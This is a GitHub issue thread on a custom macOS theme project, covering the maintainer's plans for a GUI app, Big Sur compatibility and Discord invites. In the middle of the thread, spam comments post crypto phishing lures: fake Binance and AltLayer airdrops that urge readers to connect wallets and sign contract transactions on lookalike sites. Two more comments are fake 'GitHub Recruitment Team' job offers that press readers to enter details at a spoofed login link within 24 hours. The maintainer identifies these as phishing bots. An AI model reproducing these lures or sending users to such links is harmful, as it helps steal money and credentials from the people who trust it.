### ISSUE TITLE
[INFO] Development

### ISSUE THREAD

**Issue by tsujp** [tsujp/custom-macos-gui#7]
Hey all,

It's been a while since I touched this. I'm learning some Swift in order to create a native macOS application for all the options and various settings you can tweak. Once that's done a bit update is coming. Until then this repo will remain as-is but if anyone is experiencing issues know that soon it's going to be a GUI to change your macOS Aqua theme.

**Comment by PLanB2008** [comment]
Would changing these files be possible in macos big sur at all? Gave it a quick try in a vm and couldn't get it to work, just asking in general.

**Comment by tsujp** [comment]
Another user mentioned the same files in the repo now work on Big Sur.

**Comment by VisualisationExpo** [comment]
Can't wait for that GUI app :D

**Comment by VisualisationExpo** [comment]
Any news on this GUI app? We are quite a few who are interested in learning about it as we have a Discord that could also use your expertise in that area on theming macOS .. with @CoreBedtime

**Comment by tsujp** [comment]
> Any news on this GUI app? We are quite a few who are interested in learning about it as we have a Discord that could also use your expertise in that area on theming macOS .. with @CoreBedtime

Hey! Unfortunately my life has been quite turbulent these last 3 years and I haven't been able to do probably even 10% of what I want to do (this repo included). This may sound too coincidental but a large part of that turbulence is being (hopefully) tied up at the end of this month. Then there'll be a few weeks wait on the outcome and this thing will (hopefully) be gone and I can focus more time outside of my work on my side projects (this repo included).

I still very much intend to get this done but I need to stamp out these other things in my life first and I hope that's soon. I didn't and don't want to keep people updated like I have just now (which I'll do as a one-off) because it's not concrete and I'd rather just _do_ the stuff than speculate on when I'll be doing it.

Flick me an invite to that Discord and I'll join!

**Comment by VisualisationExpo** [comment]
@tsujp completely understandable, I didn't mean to be too intrusive - It just sounds like a really good idea you had and something that is discussed and worked on here, where I would believe your opinion, knowledge and input matter:
https://discord.gg/NjxSgC7tu7

Anyone who thinks they love macOS theming and/or discussion of same are of course free to join too.

**Comment by tsujp** [comment]
> @tsujp completely understandable, I didn't mean to be too intrusive

You're all good mate. I didn't/don't want to keep people updated like that because "I will do X" tends to lead to me feeling like I've already done X. Essentially forcing myself to: "less talk more walk!"

I'll give it a join but I'll lurk until said timelines above then (hopefully x3) this ball will finally start rolling!

**Comment by net** [comment]
Has anyone found a good way to edit car files on macOS Sonoma?

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by sandipbhuyan** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @denis0826, @mioxtw, @marcosc90, @bilast, @tangweikun, @safronizator, @barisdalyan

**Comment by bergsten** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @vbaranov, @nikohoffren, @zimbres, @arhyth, @hoanghiep, @AroundMyHead, @techgaun

**Comment by sandipbhuyan** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @idkwim, @farrid19, @designpositive, @kfishnchips, @ognjengt, @ankitgoyal2042, @ryan1000

**Comment by tsujp** [comment]
The comments I keep deleting here are bot spammers posting phishing links by the way.

**Comment by charoenlap** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @JacZFW, @khafidprayoga, @nickjuntilla, @codingshot, @newlife, @damoncro, @abdul-maajid, @malkevych, @zgrdmr80, @ashchan, @chertpong, @Shubhh4, @Cyberdevil112, @Izdha, @Rxbbn, @hlhdaiaaii, @laibe, @xsrh, @helderjnpinto, @Veblin, @m0ham3dx, @Tomyleexrp, @Redracer93, @mzyan11, @haoxu13, @sinomoe, @jgh2i, @manek93, @chrisnft, @iamminci

**Comment by mr-robot77** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
crypt0ro, @NelsonRodMar, @0xxfu, @awantoch, @shfancy, @rayeaster, @xu3kev, @faramozzayw, @serverlessnomad, @rootux, @jaycyb, @marco-jardim, @baoanh1310, @HaydnHou, @teddav, @batudal, @irux, @CY0xZ, @lazzarello, @makarychev

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ada173, @eikodev, @da-bao-jian, @bts, @rahulnm, @coolhill, @thaewrapt, @clarkandrew, @mrxvt, @0x4b16b2, @wiasliaw, @TokenDance, @yds05238, @hongxuchen, @asmitadhungana, @jchen706, @ryanschwarting, @yfeng, @Mariesnlk, @0x4362

**Comment by grapefizz** [comment]
Hey @VisualisationExpo  ! Was wondering if you could send the discord invite link to that server again, as its currently invalid as of the time of writing this.

**Comment by VisualisationExpo** [comment]
> Hey @VisualisationExpo  ! Was wondering if you could send the discord invite link to that server again, as its currently invalid as of the time of writing this.

https://discord.gg/

There :)

**Comment by grapefizz** [comment]
> https://discord.gg/rRdkqJVWEX
> 
> There :)

Thaaaaank you very much

**Comment by burlapsax** [comment]
@VisualisationExpo @NotAriRay could one of you please invite me to that discord server as well? i would love to join in the conversation.

**Comment by VisualisationExpo** [comment]
> @VisualisationExpo @NotAriRay could one of you please invite me to that discord server as well? i would love to join in the conversation.

https://discord.gg/h5cSb7S5

**Comment by ZimengXiong** [comment]
I made a more detailed guide for anyone in the future wanting one
https://github.com/ZimengXiong/osx-square-window-corners
